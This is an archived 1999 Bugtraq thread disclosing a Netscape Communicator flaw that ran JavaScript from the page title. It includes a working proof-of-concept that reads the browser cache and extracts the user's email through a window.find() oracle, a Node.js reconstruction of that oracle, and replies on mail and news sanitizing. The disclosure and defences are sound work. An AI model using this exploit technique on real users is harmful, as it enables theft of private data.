Date: Mon, 24 May 1999 14:24:13 +0300
From: Georgi Guninski
To: BUGTRAQ@netspace.org
Subject: Netscape Communicator JavaScript in <TITLE> security vulnerability

There is a security bug in Netscape Communicator 4.6 Win95, 4.07 Linux (guess all 4.x versions are affected) in the way they treat JavaScript code in the title of the document.

One may embed JavaScript code in the <TITLE> tag. If the info about the document is shown, then the JavaScript code is executed. The info about the document may be invoked by a script using 'location="wysiwyg://1/about:document"'.

The problem is that the JavaScript code is executed in the security context of the "about:" protocol. This allows accessing documents in the "about:" protocol such as: "about:cache", "about:config", "about:global", etc.

Vulnerabilities:
 * Reading user's cache and accessing information such as passwords, credit card numbers.
 * Reading info about Netscape's configuration ("about:config"). This includes finding user's email address, mail servers, the encoded mail password (it must be saved and may be decoded). This allows reading user's email.

The more dangerous part is that this vulnerability MAY BE EXPLOITED USING HTML MAIL MESSAGE.

Workaround: Disable JavaScript

Demonstration is available at:
http://www.nat.bg/~joro/titlecache.html

Georgi Guninski
http://www.nat.bg/~joro
http://www.whitehats.com/guninski

----------------------------------------------------------------------------------------
<http://www.nat.bg/~joro/titlecache.html>

<HTML>
<HEAD>
<TITLE>
<SCRIPT>
/* Opened from a script running in the about: context, so the
   cross-window read of a.document is permitted. */
a=window.open('wysiwyg://1/about:cache');
s='Here are some links in your cache: \n';
for(i=0;i<7;i++) s += a.document.links[i] + '\n';
a.close();
alert(s);

/* Second window: about:config. The e-mail address is read back one
   character at a time using window.find() as a yes/no oracle. */
a=window.open('wysiwyg://1/about:config');
mag='mail.identity.useremail = ';   /* known prefix of the pref line */
mend='general.title_tips';          /* pref used to reset the find cursor */
res=mag;
charstoread=20;                     /* upper bound on characters recovered */
alert('Will try to find your email. May take some time.');

function readit() {
  for(i=0;i<charstoread;i++) {
    t=res;
    a.find(mend);
    for(c=1;c<256;c++) {
      t=res + String.fromCharCode(c);
      /* find(string, caseSensitive, backward): true if the prefix
         plus this character occurs in the about:config window */
      if (a.find(t,true,true)) { /* alert(c); */ res=t; }
    }
  }
  res=res.substring(mag.length);
  a.close();
  alert("Your email is :\n" + res);
}

setTimeout("readit()",3000);
</SCRIPT>
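The character-by-character recovery in the demo above needs nothing more than a yes/no "does this string occur in the document" oracle, which window.find() supplied. The following is an added example, not Guninski's code, that isolates that technique so it can be run under Node.js against a constructed stand-in for about:config (the preference names and values are invented for the example, and the oracle is a plain substring search standing in for window.find). It extends a known label one printable character at a time, stops when no character extends the match, and counts the oracle queries spent, which is the cost of the attack.

```javascript
// Added example: the prefix-extension oracle behind the demo above,
// isolated from Netscape. Runs under Node.js.

// Constructed stand-in for an about:config dump. Pref names and values are
// invented for this example; they are not taken from a real browser.
const SAMPLE_ABOUT_CONFIG = [
  'general.title_tips = true',
  'mail.identity.useremail = alice@example.org',
  'mail.pop_name = alice',
  'network.hosts.smtp_server = smtp.example.org',
].join('\n');

// Build a boolean "does this substring occur in the document" oracle, the
// role that window.find(str, caseSensitive, backward) played in the demo.
// It also counts how often it was asked, to show what the attack costs.
function makeFindOracle(text) {
  let queries = 0;
  const find = (needle) => {
    queries += 1;
    return text.indexOf(needle) !== -1; // case-sensitive, like find(t, true, true)
  };
  find.queryCount = () => queries;
  return find;
}

// Recover the text that follows `label` using only the oracle. Each round
// tries every printable ASCII character as the next one and keeps the first
// that still matches. When nothing extends the prefix the value is complete
// (in a config dump a newline follows it, and newline is not printable).
// Returns null if the label itself does not occur.
function extractAfterLabel(find, label, maxLen = 64) {
  if (!find(label)) return null;
  let known = label;
  for (let n = 0; n < maxLen; n++) {
    let extended = null;
    for (let c = 0x20; c < 0x7f; c++) {
      const candidate = known + String.fromCharCode(c);
      if (find(candidate)) {
        extended = candidate;
        break;
      }
    }
    if (extended === null) break;
    known = extended;
  }
  return known.substring(label.length);
}

// Stand-alone run: recover the e-mail address the demo went after.
const demoOracle = makeFindOracle(SAMPLE_ABOUT_CONFIG);
const demoEmail = extractAfterLabel(demoOracle, 'mail.identity.useremail = ');
console.log(`recovered "${demoEmail}" after ${demoOracle.queryCount()} oracle queries`);
```

Each recovered character costs at most 95 queries, so a 17-character address is in the low thousands of find() calls, which is why the demo warns that it "may take some time". The same loop works for any pref whose name is known in advance; only the label changes.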
----------------------------------------------------------------------------------------
Date: Mon, 24 May 1999 10:23:06 -0700
From: John D. Hardin
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability

On Mon, 24 May 1999, Georgi Guninski wrote:

> Vulnerabilities:
>  * Reading user's cache and accessing information such as passwords,
>    credit card numbers.
>  * Reading info about the Netscape's configuration ("about:config").
>    This includes finding user's email address, mail servers, the
>    encoded mail password (it must be saved and may be decoded). This
>    allows reading user's email.
>
> The more dangerous part is that this vulnerability MAY BE EXPLOITED
> USING HTML MAIL MESSAGE.

...unless you're sanitizing your email. Anybody using an HTML-enabled
mail client should at least be aware of the availability of this tool:

  ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html

--
 John Hardin KA7OHZ                                jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin        PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  In the Lion
  the Mighty Lion
  the Zebra sleeps tonight...
  Dee de-ee-ee-ee-ee de de de we um umma way!
-----------------------------------------------------------------------
  9 days until Crusade: the Babylon Project
----------------------------------------------------------------------------------------
Date: Tue, 25 May 1999 12:30:52 -0600
From: Brett Glass <brett@LARIAT.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability

John's recipes are great tools; we recommend them. Only one problem:
Procmail does not work on NetNews. (If this exploit works in mail it
almost certainly works in news.... Scary thought.)

--Brett Glass

At 10:23 AM 5/24/99 -0700, John D. Hardin wrote:
>On Mon, 24 May 1999, Georgi Guninski wrote:
>
> > Vulnerabilities:
> >  * Reading user's cache and accessing information such as passwords,
> >    credit card numbers.
> >  * Reading info about the Netscape's configuration ("about:config").
> >    This includes finding user's email address, mail servers, the
> >    encoded mail password (it must be saved and may be decoded). This
> >    allows reading user's email.
> >
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED
> > USING HTML MAIL MESSAGE.
>
>...unless you're sanitizing your email. Anybody using an HTML-enabled
>mail client should at least be aware of the availability of this tool:
>
>  ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
>
>--
> John Hardin KA7OHZ                                jhardin@wolfenet.com
> pgpk -a finger://gonzo.wolfenet.com/jhardin        PGP key ID: 0x41EA94F5
> PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
>-----------------------------------------------------------------------
>  In the Lion
>  the Mighty Lion
>  the Zebra sleeps tonight...
>  Dee de-ee-ee-ee-ee de de de we um umma way!
>-----------------------------------------------------------------------
>  9 days until Crusade: the Babylon Project
----------------------------------------------------------------------------------------
Date: Tue, 25 May 1999 21:40:43 -0400
From: Forrest J. Cavalier III <mibsoft@mibsoftware.com>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security

> John's recipes are great tools; we recommend them. Only one problem:
> Procmail does not work on NetNews. (If this exploit works in mail it
> almost certainly works in news.... Scary thought.)
>
> --Brett Glass
>

I don't know if the exploit works with Usenet messages, but decent Usenet
servers have filtering capabilities. INN has had perl filtering hooks since
at least 1995, and has had easily modified code to analyze and reject
messages based on headers since the beginning (1993).

In Usenet, generally most sites do not modify and sanitize messages; they
just drop and reject them with a message to the log, nothing else. Since
propagating modified messages, for whatever reason, is never acceptable,
it becomes a problem to sanitize: it would mean keeping additional special
copies around. A full Usenet feed is on the order of 1E6 messages per day,
and nearly all are binaries (UUEncoded). The John D. Hardin code looks
solid, but might bog down a server if every Usenet message had to go
through it.

Personally, I don't think HTML (or binaries) belong on Usenet in the first
place, so it's a simple policy to just drop posts containing HTML or
UUencoding. :-)

Seriously, the Hardin perl code will drop pretty easily into INN, although
I haven't tried it myself. See README.perl_hook in the INN distribution and
modify the procmail selector lines to the appropriate perl instead, and
return a reject code instead of mangling and rewriting.

Forrest J. Cavalier III, Mib Software, INN customization and consulting
'Pay-as-you-go' commercial support for INN: Only $64/hour!
Searchable hypertext INN docs, FAQ, RFCs, etc: 650+ pages:
http://www.mibsoftware.com/innsup.htm
----------------------------------------------------------------------------------------
Date: Tue, 25 May 1999 22:32:25 -0400
From: Usman <akeju00@IONAPREP.ORG>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security vulnerability

"John D. Hardin" wrote:
>
> On Mon, 24 May 1999, Georgi Guninski wrote:
>>snip!<<
> > The more dangerous part is that this vulnerability MAY BE EXPLOITED
> > USING HTML MAIL MESSAGE.
>
> ...unless you're sanitizing your email. Anybody using an HTML-enabled
> mail client should at least be aware of the availability of this tool:
>
>   ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html
>
> --
>  John Hardin KA7OHZ                                jhardin@wolfenet.com

Or, just to add to the said workaround, if you're only worried about email,
Netscape 4.5+ users can just disable JavaScript for Mail and News without
disabling JavaScript altogether. I know there's still the meta refresh
factor for HTML-enabled mail clients, though.

It would be, IMHO, a good idea for Netscape to add a little "Disable/Enable
HTML for Mail Messages" checkbox, don't you think?

-Usman Akeju
----------------------------------------------------------------------------------------
Date: Sat, 12 Jun 1999 22:58:26 -0700
From: John D. Hardin <jhardin@WOLFENET.COM>
To: BUGTRAQ@netspace.org
Subject: Re: Netscape Communicator JavaScript in <TITLE> security

On Thu, 27 May 1999, Aleph One wrote:

> That doesn't really cut it. You can embed JavaScript into things
> like onClick, onLoad, etc. You need to kill all those as well.

Thanks for pointing that out. I've updated the sanitizer to defang the
event handlers explicitly, which saves blocking the <BODY> and <TITLE> tags
themselves, and also protects links.

The current release of the sanitizer is 1.84 and it is available at

  ftp://ftp.rubyriver.com/pub/jhardin/antispam/procmail-security.html

--
 John Hardin KA7OHZ                                jhardin@wolfenet.com
 pgpk -a finger://gonzo.wolfenet.com/jhardin        PGP key ID: 0x41EA94F5
 PGP key fingerprint: A3 0C 5B C2 EF 0D 2C E5  E9 BF C8 33 A7 A9 CE 76
-----------------------------------------------------------------------
  Efficiency can magnify good, but it magnifies evil just as well.
  So, we should not be surprised to find that modern electronic
  communication magnifies stupidity as *efficiently* as it magnifies
  intelligence.
                                               -- Robert A. Matern
-----------------------------------------------------------------------
  89 days until 9/9/99